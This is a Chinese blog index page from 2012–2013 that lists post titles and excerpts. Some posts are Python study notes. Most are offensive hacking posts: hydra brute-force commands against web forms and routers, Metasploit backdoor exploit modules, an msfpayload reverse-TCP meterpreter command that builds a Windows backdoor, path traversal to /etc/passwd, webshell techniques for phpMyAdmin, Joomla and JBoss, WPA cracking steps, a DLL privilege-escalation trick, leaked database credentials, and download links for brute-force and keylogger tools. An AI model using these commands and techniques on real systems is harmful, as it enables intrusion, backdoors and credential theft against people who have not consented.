- 博客(140)
- 资源 (29)
- 收藏
- 关注
原创 How to brute force http forms in windows
hydra -l admin -P test.txt -s 80 -f 192.168.56.130 http-post-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&submit=Login:Username and/or password incorrect"
2013-07-11 16:45:21 1115
原创 Exploiting Metasploitable with Metasploit in Kali Linux
use exploit/unix/irc/unreal_ircd_3281_backdoor use exploit/unix/ftp/vsftpd_234_backdooruse exploit/multi/http/php_cgi_arg_injection use exploit/linux/misc/drb_remote_codeexecset
2013-06-28 19:27:01 1192
原创 bt5 service network
root@bt:~# /etc/init.d/networking Usage: /etc/init.d/networking {start|stop|restart|force-reload}
2013-05-18 17:05:48 1185
转载 lambda形式
lambda语句被用来创建新的函数对象,并且在运行时返回它们#!/usr/bin/python# Filename: lambda.pydef make_repeater(n): return lambda s: s*ntwice = make_repeater(2)
2012-11-09 09:22:08 695
原创 在函数中接收元组和列表
def powersum(power, *args): '''Return the sum of each argument raised to specified power.''' total = 0 for i in args: total += pow(i, power) return total
2012-11-09 09:20:26 750
原创 python------continue语句
while True: s=input('Input a word:') if s=='quit': break if len(s)<3: print ('your word is not enough') continue
2012-10-31 14:43:07 619
原创 try/exception加个else子句,只要有错误发生,程序会不断要求重新输入
while True: try: x=int(input('Please input a number for x:')) y=int(input('Please input a number for y:')) print(x/y) except: print ('fuck you,try again') else:break
2012-10-29 21:57:23 987
原创 python 递归——阶乘
def factorial(n): if n==1:return n else: return n*factorial(n-1)
2012-10-27 21:59:45 1278
原创 python3.2 字典
people = { 'Alice':{ 'phone':'2341', 'addr':'Foo drive 23' }, 'Beth':{ 'phone':'9102', 'addr':'Bar street 42'
2012-10-20 13:22:03 630
原创 string.maketrans此函数的调用
python version 3.2.2>>> from string import maketransTraceback (most recent call last): File "", line 1, in from string import maketransImportError: cannot import name maketrans
2012-10-20 12:10:33 5679 1
转载 Router Hacking with Hydra - Very Fast
root@bt:~# hydra -l admin -P wordlist.txt 192.168.1.1 http-get -v经测试效果不错
2012-10-17 18:19:02 926
转载 教你用笔记本破解无线路由器密码
最近很多人问我怎么破解WiFi密码…看来大家都对免费的东西比较有兴趣。要么也可能是我太招摇了…囧…好吧,我就写篇小小的教程,看完后,你应该能够破解大部分无线路由器密码了,写这个教程也是为了加强大家对无线网络安全性的重视,后面也有简单的防破解的办法。 好了,正式开始。首先,你需要的工具:软件:① BackTrack 3(简称BT3)BT3有光盘版,硬盘版还有U盘版
2012-10-17 09:50:21 1826
转载 学会使用这些工具,你就是合格的新手!
SQL Injection:啊D 算是新手必用吧,比较简单,没有特别复杂的界面,一看就懂,批量扫描注入功能不错,配合搜索语法比较适合新手练手明小子 比啊D多些功能,能够查询旁注,其中有个上传功能蛮不错的NBSI 这个软件对于SQL server的注入有极高的准确率Pangolin 俗称穿山甲啊,比较好用的注入工具,虽然大牛们说1.3
2012-10-12 11:41:06 1877
原创 Hacking WPA 2 Key using Reaver (WPS Bruteforce)
http://code.google.com/p/reaver-wps/downloads/list download reaver-wpstar -xvf reaver-1.4.tar.gzcd reaver-1.4/src/./configuremake make installroot@bt:~# ifconfig
2012-10-12 10:31:41 824
转载 airmon-ng 密码破解wap2
ifconfig -a 查看所有的网卡ifconfig wlan0 up 激活无线网卡airmon-ng start wlan0 设置无线网卡模式airodump-ng mon0 查看无线网络信息airodump-ng -w akast -c 6 mon0 抓包aireplay-ng -0 1 -a AP的mac -c 客户端的mac m
2012-10-12 09:46:42 2165
转载 BackTrack 5 Backdooring Windows 7 [Tutorial]
root@bt:~# msfpayload windows/meterpreter/reverse_tcp lhost=111.172.255.241 lport=443 x > win7.exeCreated by msfpayload (http://www.metasploit.com).Payload: windows/meterpreter/reverse_tcp Lengt
2012-10-11 09:29:05 686
转载 各大解析漏洞总结
Author:laterainFrom:90sec[+]IIS 6.0目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码IIS6.0 会将 xx.jpg 解析为 asp 文件。后缀解析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名)IIS6.0 都会把此类后缀文件
2012-09-03 10:52:55 840 1
转载 SpeedCMS任意文件下载读取漏洞
作者:90sex90sec《www.90sec.org》163微论坛《www.admin163.net》关键字:inurl:article/file/cidhttp://admin163.net/article/file/cid/ ... ../../../etc/passwd数据库下载地址:?file=../../../..
2012-08-31 17:28:18 1556
转载 Discuz/phpcms等开源程序配置文件集合
兄弟们在渗透测试的时候可能都需要找数据库的配置文件吧,今天刚好遇到了一个joomla怎么也找不到配置文件,于是网上搜索了一下,终于找到一个数据库配置路径的集合文件,分享给大家。。 开源系统 据库配置文件名 文件名所在的目录Discuz! config.in
2012-08-31 17:24:43 547
转载 DZ x2.5 爆路径漏洞
测试exp: http://localhost/uc_server/control/admin/db.php http://localhost/source/plugin/myrepeats/table/table_myrepeats.php http://localhost/install/include/install_lang.php
2012-08-23 13:35:56 867
转载 phpMyAdmin 后台拿webshell
(旧的东西 记录下 方便以后xxx..)1.如何拿到登陆密码. 自己想办法 2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.3.选择一个Database.运行以下语句.----start code---CREATE TABLE a (cmd text NOT NULL);INSERT
2012-08-23 13:35:17 763
转载 批量拿joomla的webshell
本次批量拿的webshell都是php的,而且大都是linux服务器搭建的,大家不要去搞破坏!首先,Google:核心是 Joomla!. 有效 XHTML 和 CSS. 打开网址,加上后缀:index.php?option=com_user&view=reset&layout=confirm来到确认用户页面,提示你要输入暗号,我们输入单引号 ' ,点击发送,
2012-08-15 16:48:42 3435
转载 joomla CMS后台另类拿WebShell方法
漏洞概要关注数(0) 关注此漏洞缺陷编号: WooYun-2011-02640漏洞标题: joomla CMS后台另类拿WebShell方法相关厂商: joomla CMS漏洞作者: akacd提交时间: 2011-08-07公开时间: 2011-08-07漏洞类型: 命令执行危害等级: 中自评Rank: 7
2012-08-15 16:47:03 2800
转载 Joomla远程上传漏洞 可直接getshell
作者:1337 1. 有些joomal需要先注册. http://site/index.php?option=com_user&view=login 2. 到上传地址 http://www.2cto.com /index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en 3.
2012-08-15 16:39:52 2715
转载 利用JBoss漏洞拿webshell方法
JBoss是一个大型应用平台,普通用户很难接触到。越是难以接触到的东西越觉得高深,借用北京公交司机李素丽的一句话“用力只能干出称职,用心才能干出优秀”,在安全上也是如此,虽然JBoss平台很难掌握,但是只要找到Jboss的罩门,一样轻松渗透,本文就如何针对Jboss的一个漏洞来获取其Webshell,由于是研究,因此仅仅点到为止。 一、信息收集与整理 1.使用漏洞特征进行搜索
2012-08-15 13:12:50 18016
转载 PHPcmsV9任意文件读取漏洞拿Shell
编辑:madman 日期:2012-07-29 分类:技术文章, 最新漏洞 评论:9条评论简介:作者:Return 前几天爆的phpcmsV9任意文件读取漏洞,其实危害是很大的,但往往还是一些管理员 觉得漏洞并不可怕,听到某人说道,即使是被人读取了数据库数据也没用,为啥,因为 他权限数据库权限单库单用户,并且v9制作前台cms发布里面就只有管理员账户并且不发 分子拿到密码也没用因为破解
2012-08-02 21:57:53 1526
转载 发一批 phpcmsV9 系统漏洞mysql
编辑:madman 日期:2012-08-02 分类:最新漏洞 评论:6条评论简介:一批 phpcmsV9 系统漏洞 批量扫描到的mysql 后面为yes大多数是可以外连的,偶尔几个不可以。需要工具的联系我。 至于怎么连接以及拿shell 请看:http://madman.in/madman5/871.htm www.tj180.com—-root—-Hlj.com@)!!db—-hu
2012-08-02 21:56:36 2129
转载 分享2个修改版的sqlmap
分享2个修改版的sqlmap。一个是由论坛核心成员uing07制作的win下的不需要py环境就能执行的sqlmap。截图:下载:http://down.f4ck.net/soft/SqlmapNoPy.rar一个是由论坛核心成员ettack制作的汉化版的sqlmap。截图:使用方法:
2012-08-01 16:34:48 707
转载 usp10.dll|lpk.dll提权工具
将此DLL文件放入服务器存在EXE的目录中,重启后(可以攻击导致重启,其他方法也行,就是让系统再次运行此目录的任何一个EXE就行)比如放在c:\php\目录下,下次重启后就会在服务器中添加用户bmd,密码为cunzhang的管理员帐号(网上已经存在了,不过没有测试成功,此款测试成功,大家可以自己测试附件压缩包为测试用的EXE,点击TEST.EXE,然后关闭就会添加用户BMD,也可以在同目录
2012-08-01 16:26:47 1913
转载 各个不同品牌水星路由默认密码
水星应该不是很多人熟悉,不要以为品牌叫水星,产地就是水星,其实水星是TP-LINK的一个子品牌,专门针对低端主流市场的产品各类路由器默认密码艾玛 701g 192.168.101.1 192.168.0.1 用户名:admin 密码:admin 用户名:SZIM 密码:SZIM艾玛701H 192.168.1.1 10.0.0.2 用户名:admin 密码:epic
2012-07-31 23:24:34 7632
转载 免费收录网站的搜索引擎登录口大全
百度搜索网站登录口:http://www.baidu.com/search/url_submit.htmlGoogle网站登录口:http://www.google.com/addurl/?hl=zh-CN&continue=/addurlGoogle新闻网站内容http://www.google.com/support/news_pub/bin/request.py?contact_ty
2012-07-31 10:37:09 12195
转载 CDlinux下安装驱动使用make命令command not found
哪个版本的CDLINUX啊,去官网下你对应版本的devel-cdl.md模块复制到CDlinux/extra/目录下,重起机器后就有make命令了。make: command not foundsudo apt-get install make gcc
2012-07-25 21:45:40 5762
转载 phpcms V9最新漏洞利用工具
工具作者:B0y疯子博客《http://Madman.in》工具下载:工具下载地址利用方法:先打开 1.bat然后 把输入命令 php9 madman.in 回车键 谷歌关键字:Powered by PHPCMS v9 © 2012
2012-07-25 17:50:34 4583
转载 BT5 U盘制作方法
bt5u盘制作教程有人又在反映做起来不能用 在做个教程吧退出后 在U盘里面有个名叫 syslinux.cfg用记事本打开 修改成和下面的一样就可以了 进到BIOS选HDD启动default vesamenu.c32prompt 0menu title http://hi.baidu.com/175714101timeout 600
2012-07-24 10:49:20 1986
转载 Backtrack5安装ThinkPad RTL8192ce-SE无线网卡驱动,同样适用其他Linux发行版本
是使用Unetbootin工具将Backtrack5安装到SD卡上的。但是我发识别无线网卡,网上找了好久,终于解决了这个问题,现在将处理的过程分享给大家。此方法同样可解决Linux系统下ThinkPad 系列或其他使用RTL无线网卡的机器。1.首先介绍以下我机器的环境:OS:Backtrack 5(基于Ubuntu Linux 10.04)CPU:Intel(R) Core(TM) i
2012-07-24 01:42:49 1794
转载 BT5无线蹭网利器光盘版
BT5(BT4)全称Back Track four,这是一个linux环境的便携系统,可以放到U盘或者盘中启动,对本身硬盘没有影响,无需在本地安装。 是圈内非常著名的黑客攻击平台,是一个封装好的Linux操作系统,内置大量的网络安全检测工具以及黑客破解软件等。BT3~4因可以方便的破解无线网络而出名,其中内置的spoonwep是一个非常悍的图形化破解wep无线网络密的工具。 B
2012-07-23 01:25:50 1451
转载 教你用笔记本破解无线路由器密码
最近很多人问我怎么破解WiFi密码…看来大家都对免费的东西比较有兴趣。要么也可能是我太招摇了…囧…好吧,我就写篇小小的教程,看完后,你应该能够破解大部分无线路由器密码了,写这个教程也是为了加强大家对无线网络安全性的重视,后面也有简单的防破解的办法。 好了,正式开始。首先,你需要的工具:软件:① BackTrack 3(简称BT3)BT3有光盘版,硬盘版还有U盘版
2012-07-23 01:02:32 2011 1
原创 2012黑客工具包.zip
直接给地址"http://kuai.xunlei.com/d/JOAJQTOCBFMK黑鹰http://kuai.xunlei.com/d/JUDWMFMQOQNZ中国黑客组织(khttp://kuai.xunlei.com/d/JKBZMGWIHRYF吾爱小生工具包http://kuai.xunlei.com/d/JQXOQRZEUVTJ华夏:http://kuai.xunlei
2012-07-21 22:01:46 2592 2
转载 webshell迅雷提权
F4技术小组 www.f4ms.netwebshell地址http://192.168.197.130/dama.asp迅雷默认安装文件夹盘符\Program Files\Thunder Network\Thunder盘符\Program Files\Thunder要修改的两个文件进入Program文件夹getAllurl.htm
2012-07-21 18:46:44 1067
全国省市区的plist文件
2015-01-12
VMware vSphere 4.1的BT种子
2012-11-11
Python标准库中文版
2012-11-02
SqlmapNoPy.rar
2012-08-01
74cmsexp_t00ls.rar
2012-07-03
sqlmap-add8352.tar.gz
2012-07-02
K8MSSQL.rar
2012-07-02
sqlmap-0.9.zip
2012-07-02
sqlmap-add8352
2012-07-02
iis批量扫描工具
2012-05-08
Webkey_1.91.apk
2012-05-02
logkeys-0.1.1a.tar.gz
2012-05-02
DUBrute_2.1
2012-04-03
ms12-020压缩包
2012-04-03
DUBrute_v2.0_rc3.rar
2012-04-02
libssh2-1.2.7.tar.gz
2012-04-01
medusa-2.0.tar.gz
2012-04-01
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人